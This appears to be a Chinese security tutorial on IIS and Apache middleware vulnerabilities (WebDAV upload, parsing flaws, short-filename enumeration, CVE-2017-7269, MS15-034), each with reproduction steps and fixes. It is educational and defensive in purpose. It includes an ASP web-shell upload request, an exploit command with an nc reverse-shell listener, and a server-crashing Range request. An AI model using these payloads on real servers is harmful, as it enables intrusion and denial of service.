![\"1746496102206-f0c0c4fe-a287-4b58-ba0b-f008886dfda8.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf43480ec.png\")
<\/p>\nMiddleware\uff0c\u63d0\u4f9b\u7cfb\u7edf\u8f6f\u4ef6\u548c\u5e94\u7528\u8f6f\u4ef6\u4e4b\u95f4\u8fde\u63a5\u7684\u8f6f\u4ef6\uff0c\u4fbf\u4e8e\u8f6f\u4ef6\u5404\u90e8\u4ef6\u4e4b\u95f4\u7684\u6c9f\u901a<\/p>\n
\u4e2d\u95f4\u4ef6\u5904\u5728\u64cd\u4f5c\u7cfb\u7edf\u548c\u66f4\u9ad8\u4e00\u7ea7\u5e94\u7528\u7a0b\u5e8f\u4e4b\u95f4\u3002\u4ed6\u5145\u5f53\u7684\u529f\u80fd\u662f\uff1a\u5c06\u5e94\u7528\u7a0b\u5e8f\u8fd0\u884c\u73af\u5883\u4e0e\u64cd\u4f5c\u7cfb\u7edf\u9694\u79bb\uff0c\u4ece\u800c\u5b9e\u73b0\u5e94\u7528\u7a0b\u5e8f\u5f00\u53d1\u8005\u4e0d\u5fc5\u4e3a\u66f4\u591a\u7cfb\u7edf\u95ee\u9898\u5fe7\u8651\uff0c\u800c\u76f4\u63a5\u5173\u6ce8\u8be5\u5e94\u7528\u7a0b\u5e8f\u5728\u89e3\u51b3\u95ee\u9898\u4e0a\u7684\u80fd\u529b \u3002\u5bb9\u5668\u5c31\u662f\u4e2d\u95f4\u4ef6\u7684\u4e00\u79cd<\/p>\n
\u662f\u4e00\u7c7b\u80fd\u591f\u4e3a\u4e00\u79cd\u6216\u591a\u79cd\u5e94\u7528\u7a0b\u5e8f\u5408\u4f5c\u4e92\u901a\u3001\u8d44\u6e90\u5171\u4eab\uff0c\u540c\u65f6\u8fd8\u80fd\u591f\u4e3a\u8be5\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u76f8\u5173\u7684\u670d\u52a1\u7684\u8f6f\u4ef6<\/p>\n
\u6211\u4eec\u7ecf\u5e38\u7ba1web\u4e2d\u95f4\u4ef6\u53eb\u505aweb\u670d\u52a1\u5668\u6216\u8005web\u5bb9\u5668<\/p>\n
iis\u3001apache\u3001tomcat\u3001nginx\u3001jboss\u3001Weblogic\u3001WebSphere<\/p>\n
IIS Server \u5728 Web \u670d\u52a1\u6269\u5c55\u4e2d\u5f00\u542f\u4e86 WebDAV \uff0c\u914d\u7f6e\u4e86\u53ef\u4ee5\u5199\u5165\u7684\u6743\u9650\uff0c\u9020\u6210\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20<\/p>\n
Version\uff1aIIS6.0<\/p>\n
\u5f00\u542f WebDAV \u548c\u5199\u6743\u9650<\/p>\n
<\/p>\n
![\"1746496107769-98fbefbc-178f-49e9-8f29-d9507cee5475.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf4685f38.png\")
<\/p>\n
\u7528burpsuite \u63d0\u4ea4OPTIONS \u67e5\u770b\u652f\u6301\u7684\u534f\u8bae<\/p>\n
![\"1746496123491-5c94cb7a-e334-494d-a47f-f7f66f7cb023.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fadf4926a63.png\")
<\/p>\n
PUT \/test.txt HTTP\/1.1\nHost: upload.moonteam.com\nContent-Length: 25\n<%eval request(\"cmd\")%>\nMOVE \/test.txt HTTP\/1.1\nHost: upload.moonteam.com\nDestination: http:\/\/upload.moonteam.com\/shell.asp<\/code><\/pre>\n![\"1746496147067-f2b10200-9137-4ba5-88ac-20068a01c750.png\"](\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\")
<\/p>\n
<\/p>\n
shell.asp\u5199\u5165\u6210\u529f<\/p>\n
\u6f0f\u6d1e\u4fee\u590d<\/h3>\n
1.\u5173\u95edwebdav<\/p>\n
2.\u5173\u95ed\u5199\u5165\u6743\u9650<\/p>\n
2\u3001iis6.0\u89e3\u6790\u6f0f\u6d1e<\/h2>\n\u57fa\u4e8e\u6587\u4ef6\u540d<\/h3>\n\u539f\u7406<\/h4>\n
\u8be5\u7248\u672c\u9ed8\u8ba4\u5c06*.asp;.jpg \u6b64\u79cd\u683c\u5f0f\u7684\u6587\u4ef6\u540d\uff0c\u5f53\u6210Asp\u89e3\u6790\u3002\u670d\u52a1\u5668\u9ed8\u8ba4\u4e0d\u89e3\u6790 ; \u53f7\u53ca\u5176\u540e\u9762\u7684\u5185\u5bb9\uff0c\u76f8\u5f53\u4e8e\u622a\u65ad<\/p>\n
iis\u9664\u4e86\u4f1a\u5c06asp\u89e3\u6790\u6210\u811a\u672c\u6267\u884c\u6587\u4ef6\u4e4b\u5916\uff0c\u8fd8\u4f1a\u5c06 cer cdx asa\u6269\u5c55\u540d\u89e3\u6790\u6210asp<\/p>\n
iis6.0->\u4e3b\u76ee\u5f55->\u914d\u7f6e \u67e5\u770b \u8fd9\u51e0\u79cd\u6269\u5c55\u540d\u90fd\u662f\u6307\u5411\u540c\u4e00\u4e2a\u6587\u4ef6<\/p>\n
C:WINDOWSsystem32inetsrvasp.dll \u6240\u4ee5\u90fd\u89e3\u6790\u6210asp<\/p>\n
<\/p>\n
\u590d\u73b0<\/h4>\n
\u901a\u8fc7\u6587\u4ef6\u4e0a\u4f20\uff0c\u6216\u8005\u521b\u5efa\u6587\u4ef6\uff0c\u683c\u5f0f\u4e3a*.asp;.jpg<\/p>\n
\u9632\u5fa1<\/h4>\n
1.\u7981\u6b62\u521b\u5efa\u548c\u4e0a\u4f20\u6b64\u7c7b\u7578\u5f62\u6587\u4ef6<\/p>\n
2.\u56fe\u7247\u5b58\u653e\u76ee\u5f55\u8bbe\u7f6e\u6210\u7981\u6b62\u811a\u672c\u6587\u4ef6\u6267\u884c<\/p>\n
3.\u5347\u7ea7iis\u7248\u672c<\/p>\n
\u57fa\u4e8e\u6587\u4ef6\u5939<\/h3>\n\u539f\u7406<\/h4>\n
\u8be5\u7248\u672c\u9ed8\u8ba4\u5c06 *.asp\/ \u76ee\u5f55\u4e0b\u7684\u6240\u6709\u6587\u4ef6\u5f53\u6210Asp\u89e3\u6790<\/p>\n
\u590d\u73b0<\/h4>\n
\u521b\u5efa\u6587\u4ef6.asp\u6587\u4ef6\u5939 \u4e0a\u4f20\u56fe\u7247\u683c\u5f0f\u540e\u95e8\u5230\u6b64\u76ee\u5f55<\/p>\n
\u9632\u5fa1<\/h4>\n
1.\u7981\u6b62\u521b\u5efa\u6b64\u7c7b\u6587\u4ef6\u5939<\/p>\n
2.\u5347\u7ea7iis\u7248\u672c<\/p>\n
3\u3001IIS\u77ed\u6587\u4ef6\u6f0f\u6d1e<\/h2>\n\u4ecb\u7ecd<\/h3>\n
Windows \u4ee5 8.3 \u683c\u5f0f\u751f\u6210\u4e0e MS-DOS \u517c\u5bb9\u7684\uff08\u77ed\uff09\u6587\u4ef6\u540d\uff0c\u4ee5\u5141\u8bb8\u57fa\u4e8e MS-DOS \u6216 16 \u4f4dWindows\u7684\u7a0b\u5e8f\u8bbf\u95ee\u8fd9\u4e9b\u6587\u4ef6\u3002\u5728cmd\u4e0b\u8f93\u5165"dir \/x"\u5373\u53ef\u770b\u5230\u77ed\u6587\u4ef6\u540d\u7684\u6548\u679c<\/p>\n
<\/p>\n
\u539f\u7406<\/h3>\n
\u5f53\u540e\u7f00\u5c0f\u4e8e4\u65f6\uff0c\u77ed\u6587\u4ef6\u540d\u4ea7\u751f\u9700\u8981\u6587\u4ef6(\u5939)\u540d\u524d\u7f00\u5b57\u7b26\u957f\u5ea6\u5927\u4e8e\u7b49\u4e8e9\u4f4d<\/p>\n
\u5f53\u540e\u7f00\u5927\u4e8e\u7b49\u4e8e4\u65f6\uff0c\u6587\u4ef6\u540d\u524d\u7f00\u5b57\u7b26\u957f\u5ea6\u5373\u4f7f\u4e3a1\uff0c\u4e5f\u4f1a\u4ea7\u751f\u77ed\u6587\u4ef6\u540d<\/p>\n
\u76ee\u524dIIS\u652f\u6301\u77ed\u6587\u4ef6\u540d\u731c\u6d4b\u7684HTTP\u65b9\u6cd5\u4e3b\u8981\u5305\u62ec\uff1aDEBUG\u3001OPTIONS\u3001GET\u3001POST\u3001HEAD\u3001TRACE\u516d\u79cd<\/p>\n
IIS 8.0\u4e4b\u540e\u7684\u7248\u672c\u53ea\u80fd\u901a\u8fc7OPTIONS\u548cTRACE\u65b9\u6cd5\u88ab\u731c\u6d4b\u6210\u529f<\/p>\n
\u590d\u73b0<\/h3>\n
\u63d0\u9192\u4e00\u4e0b IIS8.0\u4ee5\u4e0b\u7248\u672c\u9700\u8981\u5f00\u542fASP.NET\u652f\u6301\uff0cIIS>=8.0\u7248\u672c,\u5373\u4f7f\u6ca1\u6709\u5b89\u88c5ASP.NET\uff0c\u901a\u8fc7OPTIONS\u548cTRACE\u65b9\u6cd5\u4e5f\u53ef\u4ee5\u731c\u89e3\u6210\u529f\u3002\u4ee5\u4e0b\u901a\u8fc7\u5f00\u542fIIS6.0 ASP.NET\u540e\u8fdb\u884c\u590d\u73b0<\/p>\n
<\/p>\n
\u77ed\u6587\u4ef6\u540d\u7279\u5f81\uff1a<\/p>\n
1.\u53ea\u663e\u793a\u524d6\u4f4d\u7684\u5b57\u7b26,\u540e\u7eed\u5b57\u7b26\u7528~1\u4ee3\u66ff\u3002\u5176\u4e2d\u6570\u5b571\u662f\u53ef\u4ee5\u9012\u589e\u3002\u5982\u679c\u5b58\u5728\u6587\u4ef6\u540d\u7c7b\u4f3c\u7684\u6587\u4ef6,\u5219\u524d\u9762\u76846\u4e2a\u5b57\u7b26\u662f\u76f8\u540c\u7684,\u540e\u9762\u7684\u6570\u5b57\u8fdb\u884c\u9012\u589e<\/p>\n
<\/p>\n
2.\u540e\u7f00\u540d\u6700\u957f\u53ea\u67093\u4f4d,\u8d85\u8fc73\u4f4d\u7684\u4f1a\u751f\u6210\u77ed\u6587\u4ef6\u540d,\u4e14\u540e\u7f00\u591a\u4f59\u7684\u90e8\u5206\u4f1a\u622a\u65ad<\/p>\n
<\/p>\n
3.\u6240\u6709\u5c0f\u5199\u5b57\u6bcd\u5747\u8f6c\u6362\u6210\u5927\u5199\u7684\u5b57\u6bcd<\/p>\n
4.\u957f\u6587\u4ef6\u540d\u4e2d\u5305\u542b\u591a\u4e2a\u201d.\u201d\u7684\u65f6\u5019,\u4ee5\u6587\u4ef6\u6700\u540e\u4e00\u4e2a\u201d.\u201d\u4f5c\u4e3a\u77ed\u6587\u4ef6\u540d\u7684\u540e\u7f00<\/p>\n
5.\u957f\u6587\u4ef6\u540d\u524d\u7f00\/\u6587\u4ef6\u5939\u540d\u5b57\u7b26\u957f\u5ea6\u7b26\u54080-9\u548cA-Z\u3001a-z\u8303\u56f4\u4e14\u9700\u8981\u5927\u4e8e\u7b49\u4e8e9\u4f4d\u624d\u4f1a\u751f\u6210\u77ed\u6587\u4ef6\u540d,\u5982\u679c\u5305\u542b\u7a7a\u683c\u6216\u8005\u5176\u4ed6\u90e8\u5206\u7279\u6b8a\u5b57\u7b26,\u4e0d\u8bba\u957f\u5ea6\u5747\u4f1a\u751f\u6210\u77ed\u6587\u4ef6\u3002<\/p>\n
\u4f7f\u7528payload\u9a8c\u8bc1\u76ee\u6807\u662f\u5426\u5b58\u5728IIS\u77ed\u6587\u4ef6\u540d\u6f0f\u6d1e,\u4e0b\u56fe\u663e\u793a\u7684404,\u8bf4\u660e\u76ee\u6807\u5b58\u5728\u8be5\u77ed\u6587\u4ef6\u540d<\/p>\n
\u6ce8\uff1a* \u53ef\u4ee5\u5339\u914dn\u4e2a\u5b57\u7b26, n\u53ef\u4ee5\u4e3a0<\/p>\n
http:\/\/upload.moonteam.com\/~1<\/em>\/a.aspx<\/a><\/p>\n\u901a\u8fc7\u6d4f\u89c8\u5668\u8bbf\u95ee\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u77ed\u6587\u4ef6\u540d\uff0c\u4f1a\u8fd4\u56de400\u72b6\u6001\u7801, 400\u8bf4\u660e\u8be5\u6587\u4ef6\u4e0d\u5b58\u5728<\/p>\n
http:\/\/upload.moonteam.com\/zzzz~1<\/em>\/a.aspx<\/a><\/p>\n<\/p>\n
4\u3001\u901a\u8fc7\u6d4f\u89c8\u5668\u8bbf\u95ee\u4e0a\u9762\u4e24\u4e2apayload,\u6839\u636e\u8fd4\u56de\u7684\u7ed3\u679c,\u53ef\u4ee5\u8bf4\u660e\u76ee\u6807\u5b58\u5728IIS\u77ed\u6587\u4ef6\u6f0f\u6d1e<\/p>\n
5\u3001\u5224\u65ad\u6f0f\u6d1e\u5b58\u5728\u540e,\u63a5\u4e0b\u6765\u624b\u5de5\u8be6\u7ec6\u5206\u6790\u731c\u89e3IIS\u77ed\u6587\u4ef6\u540d<\/p>\n
\u5728\u7f51\u7ad9\u76ee\u5f55\u4e0b\u65b0\u5efa\u4e00\u4e2a abcde1231111.txt\u6587\u4ef6,\u5206\u522b\u8bbf\u95ee<\/p>\n
http:\/\/upload.moonteam.com\/a~1<\/em>\/a.aspx<\/a><\/p>\nhttp:\/\/upload.moonteam.com\/b~1<\/em>\/a.aspx<\/a><\/p>\n<\/p>\n
<\/p>\n
\u901a\u8fc7\u4e24\u6b21\u7684\u63d0\u4ea4\u786e\u8ba4\u4e86a\u662f404 b\u662f400 \u6240\u4ee5\u5b58\u5728a\u6587\u4ef6\u5f00\u5934\u7684\u77ed\u6587\u4ef6\u3002<\/p>\n
\u901a\u8fc7\u4e0a\u9762\u7684\u65b9\u6cd5\u63a5\u7740\u5f80\u540e\u731c<\/p>\n
http:\/\/upload.moonteam.com\/abcde~1<\/em>\/a.aspx<\/a><\/p>\n\u5230\u8fd9\u6587\u4ef6\u540d\u5df2\u7ecf\u51fa\u6765\u4e86\uff0c\u63a5\u7740\u5c31\u662f\u5224\u65ad\u662f\u76ee\u5f55\u8fd8\u662f\u6587\u4ef6<\/p>\n
<\/p>\n
http:\/\/upload.moonteam.com\/abcde*~1\/a.aspx<\/a><\/p>\n<\/p>\n
\u5224\u65ad\u662f\u6587\u4ef6 \u6309\u7167a-z\u8fdb\u884c\u6d4b\u8bd5 404\u8868\u793a\u5b58\u5728 400\u8868\u793a\u4e0d\u5b58\u5728 \u7b2c\u4e00\u4e2a\u5b57\u7b26\u4e0d\u662fa\u5f00\u5934\u7684\u6587\u4ef6http:\/\/upload.moonteam.com\/abcde~1.txt<\/em>\/a.aspx<\/a><\/p>\n<\/p>\n
6.\u6309\u7167\u4e0a\u9762\u7684\u65b9\u6cd5\u4f9d\u6b21\u731c\u89e3\u5f97\u5230\u8be5\u77ed\u6587\u4ef6\u540d\u7684\u540e\u7f00\u662ftxt \u77ed\u6587\u4ef6\u540d\u4e3a abcde~1.txt \u53ef\u4ee5\u63a5\u7740\u731c\u89e3abcde1231111.txt\u6587\u4ef6\u540d<\/p>\n
7.\u4f7f\u7528IIS\u77ed\u6587\u4ef6\u540d\u626b\u63cf\u8f6f\u4ef6\uff0c\u83b7\u53d6\u76ee\u6807\u5b58\u5728\u54ea\u4e9b\u77ed\u6587\u4ef6\u540d<\/p>\n
python iis_shortname_Scan.py http:\/\/upload.moonteam.com\/<\/a><\/p>\n<\/p>\n
\u9632\u5fa1<\/h3>\n
1\u3001\u5347\u7ea7.net framework<\/p>\n
2\u3001\u4fee\u6539\u6ce8\u518c\u8868\u952e\u503c\uff1a<\/p>\n
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlFileSystem<\/p>\n
\u4fee\u6539NtfsDisable8dot3NameCreation\u4e3a1\u3002\u4fee\u6539\u5b8c\u6210\u540e,\u9700\u8981\u91cd\u542f\u7cfb\u7edf\u751f\u6548<\/p>\n
\u547d\u4ee4\u884c\u5173\u95ed fsutil behavior set disable8dot3 1<\/p>\n
\u65b0\u5efa\u6587\u4ef6 aaaaaaaaaaaaaazzzzz.txt \u5df2\u7ecf\u6ca1\u6709\u77ed\u6587\u4ef6\u540d\u4e86<\/p>\n
<\/p>\n
\u6ce8:\u6b64\u65b9\u6cd5\u53ea\u80fd\u7981\u6b62NTFS8.3\u683c\u5f0f\u6587\u4ef6\u540d\u521b\u5efa,\u5df2\u7ecf\u5b58\u5728\u7684\u6587\u4ef6\u7684\u77ed\u6587\u4ef6\u540d\u65e0\u6cd5\u79fb\u9664,\u9700\u8981\u91cd\u65b0\u590d\u5236\u624d\u4f1a\u6d88\u5931\u3002\u5982\u679c\u4e0d\u91cd\u65b0\u590d\u5236\uff0c\u5df2\u7ecf\u5b58\u5728\u7684\u77ed\u6587\u4ef6\u540d\u5219\u662f\u4e0d\u4f1a\u6d88\u5931\u7684\u3002<\/p>\n
\u5c06web\u6587\u4ef6\u5939\u7684\u5185\u5bb9\u62f7\u8d1d\u5230\u53e6\u4e00\u4e2a\u4f4d\u7f6e\uff0c\u5982c:www\u5230c:ww,\u7136\u540e\u5220\u9664\u539f\u6587\u4ef6\u5939\uff0c\u518d\u91cd\u547d\u540dc:ww\u5230c:www<\/p>\n
4\u3001iis RCE-CVE-2017-7269<\/h2>\n\u4ecb\u7ecd<\/h3>\n
Microsoft windows Server 2003 R2\u4e2d\u7684 Interne\u4fe1\u606f\u670d\u52a1IIS6.0\u4e2d\u7684 WebDAV\u670d\u52a1\u4e2d\u7684ScStoragePathFromUrl\u51fd\u6570\u4e2d\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u4ee5 If:<http:\/\/ \u5f00\u5934\u7684\u957f\u6807\u5934\u6267\u884c\u4efb\u610f\u4ee3\u7801 PROPFIND\u8bf7\u6c42<\/p>\n
\u5f71\u54cd\u8303\u56f4<\/h3>\n
WiNdows Server 2003 R2\u4e0a\u4f7f\u7528IIS6.0\u5e76\u5f00\u542f WebDAV\u6269\u5c55<\/p>\n
\u590d\u73b0<\/h3>\n
<\/p>\n
https:\/\/github.com\/g0rx\/iis6-exploit-2017-CVE-2017-7269<\/a><\/p>\npython iis 192.168.0.115 80 192.168.0.154 9999<\/p>\n
nc -lvnp 9999<\/p>\n
\u9632\u5fa1<\/h3>\n
1.\u5173\u95ed WebDav\u670d\u52a1<\/p>\n
2.\u5347\u7ea7<\/p>\n
3.\u90e8\u7f72\u5b89\u5168\u8bbe\u5907<\/p>\n
\u4e8c\u3001iis7x<\/h1>\n1\u3001iis7\u6587\u4ef6\u89e3\u6790\u6f0f\u6d1e<\/h2>\n\u539f\u7406<\/h3>\n
IIS7.x\u7248\u672c\u5728Fast-CGl\u8fd0\u884c\u6a21\u5f0f\u4e0b\uff0c\u5728\u4efb\u610f\u6587\u4ef6\uff0c\u4f8b\uff1aa001.jpg\/png\u540e\u9762\u52a0\u4e0a\/.php\uff0c\u4f1a\u5c06a001.jpg\/png\u89e3\u6790\u4e3aphp\u6587\u4ef6<\/p>\n
\u590d\u73b0<\/h3>\n
\u4e0a\u4f20\u56fe\u7247\u5230\u7f51\u7ad9\u5141\u8bb8\u76ee\u5f55 \u5728\u56fe\u7247\u4e0a\u52a0\u4e0a\/.php<\/p>\n
http:\/\/192.168.0.148:8980\/1.jpg\/.php<\/a><\/p>\n<\/p>\n
\u9632\u5fa1<\/h3>\n
1.\u914d\u7f6e cgi fix_pathinfo\uff08php inil\u4e2d\uff09\u4e3a0\u5e76\u91cd\u542fphp-cgi\u7a0b\u5e8f<\/p>\n
2.\u7f16\u8f91\u6620\u5c04\u6a21\u5757->\u6620\u5c04->\u6253\u52fe<\/p>\n
<\/p>\n
2\u3001HTTP.SYS\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c(MS15-034)<\/h2>\n\u4ecb\u7ecd<\/h3>\n
HTTP.SYS\u662fMicrosoft Windows\u5904\u7406HTTP\u8bf7\u6c42\u7684\u5185\u6838\u9a71\u52a8\u7a0b\u5e8f\uff0c\u4e3a\u4e86\u4f18\u5316IIS\u670d\u52a1\u5668\u6027\u80fd\uff0c\u4eceIIS6.0\u5f15\u5165\uff0cIIS\u670d\u52a1\u8fdb\u7a0b\u4f9d\u8d56HTTP.SYS<\/p>\n
HTTP.SYS\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u5b9e\u8d28\u662fHTTP.SYS\u7684\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u5f53\u653b\u51fb\u8005\u5411\u53d7\u5f71\u54cd\u7684Windows\u7cfb\u7edf\u53d1\u9001\u7279\u6b8a\u8bbe\u8ba1\u7684HTTP \u8bf7\u6c42\uff0cHTTP.sys \u672a\u6b63\u786e\u5206\u6790\u65f6\u5c31\u4f1a\u5bfc\u81f4\u6b64\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u7cfb\u7edf\u5e10\u6237\u7684\u4e0a\u4e0b\u6587\u4e2d\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002<\/p>\n
\u4e3b\u8981\u5b58\u5728Windows+IIS\u7684\u73af\u5883\u4e0b\uff0c\u4efb\u4f55\u5b89\u88c5\u4e86\u5fae\u8f6fIIS 6.0\u4ee5\u4e0a\u7684Windows Server 2008 R2\/Server2012\/Server 2012 R2\u4ee5\u53caWindows 7\/8\/8.1\u64cd\u4f5c\u7cfb\u7edf\u90fd\u53d7\u5230\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u5f71\u54cd\u9a8c\u8bc1\u8fd9\u4e2a\u6f0f\u6d1e<\/p>\n
\u5f71\u54cd\u8303\u56f4<\/h3>\n
Windows7\u3001Windows server 2008 R2\u3001Windows8\u3001Windows server2012\u3001Windows8.1\u548cWindows server 2012 R2<\/p>\n
\u5f71\u54cd\u7248\u672c<\/h3>\n
IS7.5\u3001IIS8.0\u3001IIS8.5<\/p>\n
\u590d\u73b0<\/h3>\n
\u8bbf\u95ee\u7f51\u7ad9<\/p>\n
\u7f16\u8f91\u8bf7\u6c42\u5934\uff0c\u589e\u52a0Range: bytes=0-18446744073709551615\u5b57\u6bb5\uff0c\u82e5\u8fd4\u56de\u7801\u72b6\u6001\u4e3a416 RequestedRange Not Satisfiable\uff0c\u5219\u5b58\u5728HTTP.SYS\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<\/p>\n
<\/p>\n
GET \/ HTTP\/1.1\nHost: 192.168.0.148\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko\/20100101\nFirefox\/91.0\nAccept:\ntext\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nRange: bytes=0-18446744073709551615\nContent-Length: 2<\/code><\/pre>\npoc \u5730\u5740 https:\/\/github.com\/davidjura\/MS15-034-IIS-Active-DoS-Exploit-PoC<\/a><\/p>\n<\/p>\n
\u670d\u52a1\u5668\u5361\u8d77\u6765\u4e86<\/p>\n
\u4fee\u590d\u5efa\u8bae<\/h3>\n
1.\u5b89\u88c5\u4fee\u590d\u8865\u4e01\uff08KB3042553\uff09<\/p>\n
\u4e09\u3001apache<\/h1>\n
Apache \u662f\u4e16\u754c\u4f7f\u7528\u6392\u540d\u7b2c\u4e00\u7684 Web \u670d\u52a1\u5668\u8f6f\u4ef6\u3002\u5b83\u53ef\u4ee5\u8fd0\u884c\u5728\u51e0\u4e4e\u6240\u6709\u5e7f\u6cdb\u4f7f\u7528\u7684\u8ba1\u7b97\u673a\u5e73\u53f0\u4e0a\uff0c\u7531\u4e8e\u5176\u8de8\u5e73\u53f0\u548c\u5b89\u5168\u6027\u88ab\u5e7f\u6cdb\u4f7f\u7528\uff0c\u662f\u6700\u6d41\u884c\u7684 Web \u670d\u52a1\u5668\u7aef\u8f6f\u4ef6\u4e4b\u4e00<\/p>\n
apache\u76ee\u5f55\u7ed3\u6784<\/p>\n
bin\uff1a\u5b58\u653e\u5e38\u7528\u547d\u4ee4\u5de5\u5177\uff0c\u5982httpd<\/p>\n
cgi-bin\uff1a\u5b58\u653elinux\u4e0b\u5e38\u7528\u547d\u4ee4\uff0c\u5982xxx.sh<\/p>\n
error\uff1a\u9519\u8bef\u8bb0\u5f55<\/p>\n
htdocs\uff1a\u7f51\u7ad9\u6e90\u7801<\/p>\n
icons\uff1a\u7f51\u7ad9\u56fe\u6807<\/p>\n
manual\uff1a\u624b\u518c<\/p>\n
modules\uff1a\u6269\u5c55\u6a21\u5757<\/p>\n
1\u3001\u672a\u77e5\u6269\u5c55\u540d\u89e3\u6790\u6f0f\u6d1e<\/h2>\n\u6f0f\u6d1e\u539f\u7406<\/h3>\n
Apache\u9ed8\u8ba4\u4e00\u4e2a\u6587\u4ef6\u53ef\u4ee5\u6709\u591a\u4e2a\u4ee5\u70b9\u5206\u5272\u7684\u540e\u7f00\uff0c\u5f53\u6700\u53f3\u8fb9\u7684\u540e\u7f00\u65e0\u6cd5\u8bc6\u522b\uff0c\u5219\u7ee7\u7eed\u5411\u5de6\u8bc6\u522b\uff0c\u76f4\u5230\u8bc6\u522b\u5230\u5408\u6cd5\u540e\u7f00\u624d\u8fdb\u884c\u89e3\u6790<\/p>\n
\u590d\u73b0<\/h3>\n
\u4e0a\u4f20\u4e86\u4e00\u4e2a\u540d\u5b57\u53eblcx.php.qqq \u7684\u6587\u4ef6\uff0c\u5f53\u6b64\u7279\u6027\u5b58\u5728\u7684\u65f6\u5019\uff0c\u4e00\u770b.qqq\u4e0d\u8ba4\u8bc6\u7ee7\u7eed\u89e3\u6790\uff0c.php\u6211\u8ba4\u8bc6\uff0c\u89e3\u6790\u6210php\u6587\u4ef6\u4e86\u3002\u8bbf\u95ee\u4e5f\u662f\u540c\u7406\uff0c\u6bd4\u5982\u8bbf\u95eephpinfo.php.qqq\u53ef\u6210\u529f\u663e\u793aphpinfo<\/p>\n
\u54ea\u4e9b\u540e\u7f00Apache\u4e0d\u8ba4\u8bc6\uff1f<\/p>\n
\u4e0d\u5728mime.types\u5f53\u4e2d\u7684\u90fd\u4e0d\u8ba4\u8bc6 \uff08Multipurpose Internet Mail Extensions\uff09<\/p>\n
\u5230\u5b89\u88c5Apache\u7684\u76ee\u5f55\u4e0b\u627e\u8fd9\u4e2a\u6587\u4ef6<\/p>\n
<\/p>\n
<\/p>\n
\n- \n
\u4f7f\u7528module\u6a21\u5f0f\u4e0ephp\u7ed3\u5408\u7684\u6240\u6709\u7248\u672capache\u5b58\u5728\u672a\u77e5\u6269\u5c55\u540d\u89e3\u6790\u6f0f\u6d1e\u3002<\/p>\n<\/li>\n
- \n
\u4f7f\u7528fastcgi\u6a21\u5f0f\u4e0ephp\u7ed3\u5408\u7684\u6240\u6709\u7248\u672capache\u4e0d\u5b58\u5728\u6b64\u6f0f\u6d1e\u3002<\/p>\n<\/li>\n
- \n
\u5229\u7528\u6b64\u6f0f\u6d1e\u65f6\u5fc5\u987b\u4fdd\u8bc1\u6269\u5c55\u540d\u4e2d\u81f3\u5c11\u5e26\u6709\u4e00\u4e2a.php\uff0c\u4e0d\u7136\u5c06\u9ed8\u8ba4\u4f5c\u4e3atxt\/html\u6587\u6863\u5904\u7406<\/p>\n<\/li>\n<\/ol>\n
kali\u590d\u73b0\u6f0f\u6d1e<\/h3>\n
sudo service apache2 restart<\/p>\n
cd \/etc\/apache2\/mods-enabled<\/p>\n
sudo vi php7.4.conf<\/p>\n
<\/p>\n
\u6b63\u5219\u8868\u8fbe\u5f0f\u4e2d\uff0c$\u7528\u6765\u5339\u914d\u5b57\u7b26\u4e32\u7ed3\u5c3e\u4f4d\u7f6e\u3002\u5982\u679c\u8bbe\u7f6e\u4e86RegExp\u5bf9\u8c61\u7684Multiline\u5c5e\u6027\u7684\u6761\u4ef6\u4e0b\uff0c\u8fd8\u4f1a\u5339\u914d\u5230\u5b57\u7b26\u4e32\u7ed3\u5c3e\u7684\u6362\u884c\u7b26"n"\u6216"r"<\/p>\n
\u628a$\u6362\u6210. \u7136\u540e\u91cd\u542fapache\u5373\u53ef\u89e3\u6790\u6210php sudo service apache2 restart<\/p>\n
\u5728\/var\/www\/html \u521b\u5efax.php.bak \u5e76\u5199\u5165 <?php phpinfo();?><\/p>\n
<\/p>\n
\u4fee\u590d\u5efa\u8bae<\/h3>\n
\u89e3\u51b3\u65b9\u6848\u4e00<\/p>\n
\u5728httpd.conf\u6216httpd-vhosts.conf\u4e2d\u52a0\u5165\u4ee5\u4e0b\u8bed\u53e5\uff0c\u4ece\u800c\u7981\u6b62\u6587\u4ef6\u540d\u683c\u5f0f\u4e3a.php.\u7684\u8bbf\u95ee\u6743\u9650\uff1a<\/p>\n
\u89e3\u51b3\u65b9\u6848\u4e8c<\/p>\n
\u5982\u679c\u9700\u8981\u4fdd\u7559\u6587\u4ef6\u540d\uff0c\u53ef\u4ee5\u4fee\u6539\u7a0b\u5e8f\u6e90\u4ee3\u7801\uff0c\u66ff\u6362\u4e0a\u4f20\u6587\u4ef6\u540d\u4e2d\u7684\u201c.\u201d\u4e3a\u201c_\u201d\uff1a<\/p>\n
$filename = strreplace(‘.’, ‘<\/em>‘, $filename);<\/p>\n2\u3001AddHandler\u5bfc\u81f4\u7684\u89e3\u6790\u6f0f\u6d1e<\/h2>\n\u6f0f\u6d1e<\/h3>\n
